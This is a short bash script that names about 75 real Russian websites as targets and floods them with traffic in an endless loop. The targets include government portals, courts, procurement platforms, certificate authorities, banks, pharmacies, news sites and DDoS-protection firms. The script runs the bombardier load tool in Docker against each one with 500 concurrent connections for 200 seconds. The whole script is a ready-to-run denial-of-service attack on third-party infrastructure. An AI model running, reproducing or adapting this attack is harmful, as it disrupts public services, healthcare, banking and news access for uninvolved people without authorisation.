#!/bin/bash -x

DESTS=(
    "www.volgograd.ru"
    "apparat.lenobl.ru"
    "mosreg.ru"
    "orel-region.ru"
    "https://krd.ru/"
    "https://msk.rt.ru/"
    "https://lenta.ru/"
    "http://duma.gov.ru/"
    "http://www.president-sovet.ru/"
    "https://www.gosuslugi.ru/"
    "zakupki.gov.ru/epz/main/public/home.html"
    "gossluzhba.gov.ru"
    "defence.council.gov.ru"
    "budget.council.gov.ru"
    "www.scrf.gov.ru"
    "www.ksrf.ru/ru/Pages/default.aspx"
    "www.vsrf.ru"
    "www.mchs.gov.ru"
    "minjust.gov.ru/ru/"
    "rosguard.gov.ru"
    "customs.gov.ru"
    "udprf.ru"
    "favt.gov.ru"
    "iecp.ru/ep/ep-verification"
    "iecp.ru/ep/uc-list"
    "uc-osnovanie.ru"
    "www.nucrf.ru"
    "www.roseltorg.ru"
    "www.astralnalog.ru"
    "www.nwudc.ru"
    "www.center-inform.ru"
    "kk.bank/UdTs"
    "dreamkas.ru"
    "izhtender.ru"
    "www.kartoteka.ru"
    "http://www.rcarus.ru/"
    "https://rk72.ru/index.php"
    "http://www.otchet-online.ru/"
    "https://www.cit-ufa.ru/"
    "ddos-guard.net/ru"
    "stormwall.pro"
    "qrator.net/ru"
    "solidwall.ru"
    "drom.ru"
    "gazeta.ru"
    "citilink.ru"
    "pochta.ru"
    "kommersant.ru"
    "auto.drom.ru"
    "rg.ru"
    "vz.ru"
    "tass.ru"
"https://etpgpb.ru"
"https://api.etpgpb.ru"
"https://etp.gpb.ru/"
"https://passport.etpgpb.ru"
"https://gos.etpgpb.ru"
"https://inter-rao.etpgpb.ru" 
"https://rosnedra.etpgpb.ru"
"https://gpn.etpgpb.ru"
"https://geh.etpgpb.ru" 
"https://trade.etpgpb.ru"
"https://gb.etpgpb.ru"

"https://www.eapteka.ru"
"https://www.asna.ru/"
"https://366.ru"
"https://stolichki.ru"
"https://aptekamos.ru"
"https://vseapteki.ru"
"https://www.rigla.ru"
"https://planetazdorovo.ru"
"https://samson-pharma.ru"
"https://zdorov.ru"
"https://apteka.ru"
"auth.tcsbank.ru"
)

while true; do
    for DEST in ${DESTS[@]}; do
        sudo docker run -t --rm alpine/bombardier -c 500 -d 200s -l $DEST
        sleep 1
    done
done
